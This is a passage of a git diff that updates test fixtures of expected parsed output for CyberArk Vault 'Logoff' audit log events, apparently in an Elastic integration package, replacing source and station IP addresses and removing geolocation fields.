\u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:28\",\"IsoTimestamp\":\"2021-03-11T17:48:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -902,20 +831,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -935,7 +852,7 @@ "PSMPGW_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -943,8 +860,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:49:06Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "PSMPGW_VAGRANT", @@ -957,8 +874,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904261900Z", - "original": "\u003c5\u003e1 2021-03-11T17:49:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:49:06\",\"IsoTimestamp\":\"2021-03-11T17:49:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641159200Z", + "original": "\u003c5\u003e1 2021-03-11T17:49:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:49:06\",\"IsoTimestamp\":\"2021-03-11T17:49:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -982,17 +899,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1012,7 +920,7 @@ "Administrator" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -1020,8 +928,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:20Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", @@ -1034,8 +942,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904263300Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:20\",\"IsoTimestamp\":\"2021-03-14T12:57:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641164600Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:20\",\"IsoTimestamp\":\"2021-03-14T12:57:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -1059,33 +967,12 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1108,8 +995,8 @@ "Administrator" ], "ip": [ - "81.32.170.205", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { @@ -1117,9 +1004,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T13:49:36Z", - "gateway_station": "34.71.250.247", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", @@ -1132,8 +1019,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904264500Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:36\",\"IsoTimestamp\":\"2021-03-14T13:49:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"34.71.250.247\"}}}", + "ingested": "2021-12-09T13:37:11.641168500Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:36\",\"IsoTimestamp\":\"2021-03-14T13:49:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "8", "kind": "event", "action": "logoff", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log 